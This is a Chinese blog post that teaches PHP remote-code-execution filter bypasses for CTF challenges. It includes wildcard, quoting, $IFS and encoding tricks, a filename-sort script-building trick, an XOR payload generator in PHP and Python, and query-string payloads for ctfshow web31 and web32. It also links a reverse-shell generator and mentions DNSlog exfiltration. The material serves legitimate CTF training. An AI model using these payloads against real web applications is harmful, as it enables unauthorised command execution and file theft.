RCE绕过及ctf多种玩法

RCE

推荐在线生成反弹shell的网站

[\~\]#棱角 ::Edge.Forum\*](https://forum.ywhack.com/shell.php) ### 代码执行 PHP 代码执行函数: eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort () ### 命令执行 PHP 命令执行函数: system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen ()、passthru()等 ### 绕过 #### 关键词过滤 1、过滤flag关键字 利用通配符 > cat fl\* 匹配文件名前两位为fl的文件 > > cat ?l\* 匹配文件名第一位随机,第二位为l的文件 > ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/31df3615ea80449eac342b15e57b880f.png) 2、转义符号、空变量( ∗ 、 \*、 ∗、@、 x 、 x、 x、{x}) ```shell c\at f\lag.txt cat fl''ag.txt c'a't flag.txt ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/f44e682731004885b2033981822daca5.png) ```shell ca$*t fl$*ag.txt ca$@t [email protected] ca$3t fl$3ag.txt ca${v}t fl${v}ag.txt ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/93b4e8d7f7a743d2b43a71d08f8e5d0a.png) 3、拼接法 ```shell a=f;b=lag;c=.txt;cat$IFS$a$b$c; ``` $IFS 等于空格 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/512a8974bad14ac6b428cab9fd544f4f.png) 4、反引号 反引号在linux中代表命令执行 ```shell cat `ls` //查看目录下所有文件 ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/4f8d8a8544fa464dbb724a24615bc5ff.png) 5、编码 将被过滤的地方编码 然后利用解码命令执行 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/2bfd18f19b0a48eeab79d37129ebb188.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/82dbe00f0b55477db160061f73e289d0.png) 6、组合绝活 ```shell touch "g.txt" touch "fla\\" touch "t \\" touch "ca\\" ls -t > shell //-t 按照时间排序 sh shell ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/eabeefe15cf54d11b57b792774e53146.png) 7、异或无符号 例如下题,过滤掉所有字符了 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/d7d2d576c7a046318039a04a8d536fe3.png) 将正则放进代码修改运行即可 ```php =32&ord($c)<=126) { $contents=$contents.$c." ".$a." ".$b."\n"; } } } } fwrite($myfile,$contents); fclose($myfile); ``` 生成txt后,使用下列python代码构造payload ```python import requests import urllib from sys import * import os def action(arg): s1 = "" s2 = "" for i in arg: f = open("xor_rce.txt", "r") while True: t = f.readline() if t == "": break if t[0] == i: # print(i) s1 += t[2:5] s2 += t[6:9] break f.close() output = "(\"" + s1 + "\"^\"" + s2 + "\")" return (output) while True: param = action(input("\n[+] your function:")) + action(input("[+] your command:")) + ";" print(param) ``` ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/002efb1510d0493ca61ca0e69f7828db.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/2da9ee6032d949f087a13d2b4a8a4ce8.png) #### 命令过滤 过滤cat > more:一页一页的显示档案内容 > > less:与 more 类似 > > head:查看头几行 > > tac:从最后一行开始显示,可以看出tac是cat的反向显示tai1:查看尾几行 > > nl:显示的时候,顺便输出行号 > > od:以二进制的方式读取档案内容 > > vi:一种编辑器,这个也可以查看 > > vim:一种编辑器,这个也可以查看 > > sort:可以查看 > > uniq:可以查看 > > file -f:报错出具体内容 > > sh /flag.txt //报错出文件内容 > > curl file:///root/f/flag > > strings flag > > uniq -c flag > > bash -v flag > > rev flag #### 空格过滤 %09(url传递)(cat%09flag.txt) cat${IFS}flag.txt ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/6c249fa494264deda6902e2850ac9982.png) a=flag;b=.txt;cat I F S IFS IFSa$b; ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/37e4486c7632492d83cbd1898ca53468.png) {cat,flag.txt} ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/3e9311c07293479d95a936b9c7bebef7.png) ### 无回显利用 1、直接写个文件看能否访问 2、直接进行对外访问(dnslog数据外带) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/f1a16e06011845e182a808cd09e9d1e3.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/3eb0bce40a894c1791990dfde0d7856c.png) ### ctf多种玩法 #### 参数逃逸 ctfshow-web31 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/f2e0b33fe5224ef98f7c6ac7b0c47544.png) ?c=eval($_GET\["aa"\]);\&aa=system("sort+flag.php"); ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/a8f66d5f219640b391d8efc2001139d2.png) #### rce转文件包含伪协议 ctfshow-web32 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/ab9543091da14ad1adacbbf812dd4c88.png) ?c=include$_GET\["code"\]?\>\&code=php://filter/read=convert.base64-encode/resource=flag.php ?\>在这里的作用是为了使得\&code=被当作参数,而不是php代码执行 ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/1041fc195dab4bdab9e37c89180ed672.png) ![在这里插入图片描述](https://i-blog.csdnimg.cn/direct/bd6d27d2f2c5465cbe3b534763a99500.png)

相关推荐
浩浩测试一下21 分钟前
网络安全实战指南:从安全巡检到权限维持的应急响应与木马查杀全(命令查收表)
linux·安全·web安全·ubuntu·网络安全·负载均衡·安全架构
mooyuan天天5 小时前
Webug3.0通关笔记17 中级进阶(第01-05关)
web安全·文件包含·sql注入·webug靶场
vortex58 小时前
网络安全入门综述
安全·web安全·网络安全
神经毒素13 小时前
WEB安全--社会工程--SET钓鱼网站
安全·web安全
琢磨先生David17 小时前
重构数字信任基石:Java 24 网络安全特性的全维度革新与未来防御体系构建
java·web安全·密码学
见青..20 小时前
【学习笔记】文件包含漏洞--本地远程包含、伪协议、加密编码
前端·笔记·学习·web安全·文件包含
lally.1 天前
2025蓝桥杯省赛网络安全组wp
web安全·蓝桥杯
CyberSecurity_zhang1 天前
汽车网络安全 -- 理解暴露面、攻击面和攻击向量
网络安全·信息安全·汽车
xiaoniu6671 天前
毕业设计-基于机器学习入侵检测系统
网络·安全·web安全
Suckerbin1 天前
pikachu靶场-敏感信息泄露
网络·学习·安全·网络安全